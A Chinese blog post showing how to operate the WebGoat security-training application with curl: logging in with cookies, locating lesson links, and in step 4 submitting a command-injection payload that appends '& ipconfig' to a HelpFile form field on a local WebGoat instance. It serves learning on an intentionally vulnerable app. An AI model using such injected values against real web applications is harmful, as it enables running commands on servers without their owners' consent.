curl摸擬瀏覽器運行WebGoat

原創 lvming404 2020-02-20 22:09

這個WebGoat有一些個性化的操作,所以記錄在此

步驟:

 

1、 curl -u "guest:guest" -D cookie.jar "http://localhost/WebGoat/attack"  -v

登錄進入WebGoat,並保存COOKIE

 

2、 curl -u "guest:guest" -b cookie.jar -d "start=Start+WebGoat" "http://localhost/WebGoat/attack" -v

提交start = Start WebGoat的表單,進入WebGoat的主頁面。

此時,應該查看頁面源代碼中你想點的鏈接是什麼

如:

 

<td><img src="images/buttons/lessonComplete.jpg"><a href="attack?Screen=497&menu=1200">Command Injection</a></td>



 


注意: WebGoat對不同的COOKIE,返回的頁面鏈接並不相同,如果在後面的步驟中,你訪問的是瀏覽器裏查看到的鏈接,很可能那個鏈接就不存在,返回的是主頁中的介紹信息,而不是你想訪問的鏈接的內容。


另外,由於WebGoat是使用NTLM認證協議,所以每次curl,都得帶-u "guest:guest"


 


3、curl -u "guest:guest" -b cookie.jar "http://localhost/WebGoat/attack?Screen=503&menu=1200" -v


這樣就可以訪問到你想訪問的鏈接了。


 


4、如果要實現命令注入,提交如下:


curl -u "guest:guest" -b cookie.jar -d "HelpFile=AccessControlMatrix.help%22%20%26%20ipconfig&SUBMIT=View" "http://localhost/WebGoat/attack?Screen=497&menu=1200" -v > a.html


 


 
 





















lvming404



發佈了53 篇原創文章 · 獲贊 2 · 訪問量 11萬+





私信

關注














    





發表評論














所有評論



還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.







相關文章








關於遊戲付費的一點想法






最近被問到,爲什麼玩原神只花了1000多塊錢,我被問住了,不知該作何反應。這裏打算重新整理一下思路,嘗試回答。
首先談談錢,對於一般打工人來說,金錢是勞動的憑證,我們可以用它來兌換其他人的勞動成果。在買斷制、點卡制遊戲中,金錢體現了這種性質






氫氦

2024-05-01 14:37:05









url重寫重定向所有http網址到https網址






web.config中輸入一下內容
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<rewrite>






hiningrise

2024-05-01 14:30:04









linux導出安裝包






linux導出安裝包
1 背景
部署企業內網環境,主機無法連通外網.不能直接使用yum install安裝程序.針對此種情況有如下兩個安裝辦法
源碼安裝(需要編譯環境,安裝複雜,容易出錯,不推薦)
使用rpm離線安裝(需要離線安裝包,簡單






herbert

2024-05-01 14:29:44









推薦3款程序員常用的畫圖工具






前言
經常看到有小夥伴在DotNetGuide技術社區微信交流羣裏問:有什麼好用的畫圖工具推薦的?今天大姚給大家推薦3款程序員日常工作中常用的畫圖工具,大家可以根據自己的需求選擇。
ProcessOn
ProcessOn是一款專業強大在線作






追逐時光

2024-05-01 14:25:24









vscode 刷python代碼格式






安裝black format
之後alt+ shift +f即可.






張博的博客

2024-05-01 14:22:13









關於JSON轉字符串後前端與python得到的結果不一致的問題,及對象按key排序






背景:
  哈希碼參數校驗防參數篡改。前端下發接口時對參數按約定祕鑰和邏輯進行加密,後端在獲取到請求後對請求參數以同樣的祕鑰和邏輯加密計算得出哈希值,再與請求的哈希值對比,如果不一致則證明參數被篡改。
前端代碼:
  對json對象進行了按






TheFirstDream

2024-05-01 14:21:43









mycat啓動報錯Could not reserve enough space for 2097152KB object heap






mycat啓動報錯:
報錯1:Could not reserve enough space for 2097152KB object heap
找到wrapper.conf修改內存大小爲1G
 
# Initial Java Heap






uper超人

2024-05-01 14:15:42









《最新出爐》系列入門篇-Python+Playwright自動化測試-42-強大的可視化追蹤利器Trace Viewer






1.簡介
在我們日常執行自動化測試工作的過程中,經常會遇到一些偶發性的bug,但是因爲bug是偶發性的,我們不一定每次執行都能復現,所以我們在測試執行的時候,追蹤用例執行就變得非常重要了。playwright提供了一個Playwright






北京-宏哥

2024-05-01 14:14:41









前端使用 Konva 實現可視化設計器(8)- 預覽框






請大家動動小手,給我一個免費的 Star 吧~
大家如果發現了明顯的 Bug,可以提 Issue 喲~
這一章我們實現一個預覽框,實時、可交互定位的。
github源碼
gitee源碼
示例地址
預覽框
定位方法
移動畫布,將傳入






xachary

2024-05-01 14:08:11









大數據怎麼學?對大數據開發領域及崗位的詳細解讀,完整理解大數據開發領域技術體系






經常有小夥伴和我諮詢大數據怎麼學,我覺得有必要寫一下關於大數據開發的具體方向,下次就不用苦哈哈的打字回覆了。直接回覆文章。
1.大數據崗位劃分
我們通常說的大數據開發主要分爲三大方向:
1.1數據平臺開發工程師
主要從事後端開發,結合Had






魯邊

2024-05-01 14:06:40









如何使用python發郵件






import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
def send_email(send






vye001

2024-05-01 14:06:10









我通過CKA和CKS啦!






作爲一個運維狗,考下Kubernetes認證可以說是職業基本素養之一了。
我是去年6月買的bundle,當時打了6折,435刀(摺合人民幣3100多),晃悠大半年才發現再不考就過期了,所以開始着手準備。肝了一段時間,總算拿下雙證!
可喜可賀






Young233

2024-05-01 14:04:30









.NET 中使用 GaussDB C# ORM






openGauss(GaussDB )
openGauss是一款全面友好開放,攜手夥伴共同打造的企業級開源關係型數據庫。openGauss採用木蘭寬鬆許可證v2發行,提供面向多核架構的極致性能、全鏈路的業務、數據安全、基於AI的調優和高效運






孫凱旋

2024-05-01 14:03:39









.NET中使用 openGauss C# ORM






openGauss(GaussDB )
openGauss是一款全面友好開放,攜手夥伴共同打造的企業級開源關係型數據庫。openGauss採用木蘭寬鬆許可證v2發行,提供面向多核架構的極致性能、全鏈路的業務、數據安全、基於AI的調優和高效運






孫凱旋

2024-05-01 14:03:39









基於SSM的校園論壇網站系統畢業設計論文【範文】






摘要
隨着信息技術的不斷進步與深入應用,校園論壇系統作爲高校師生信息交流、知識共享和意見交換的重要網絡平臺,其作用日益凸顯。基於此背景,本畢業設計論文旨在開發一個基於SSM(Spring + Spring MVC + MyBatis)框架的






Lucky帥小武

2024-05-01 14:03:29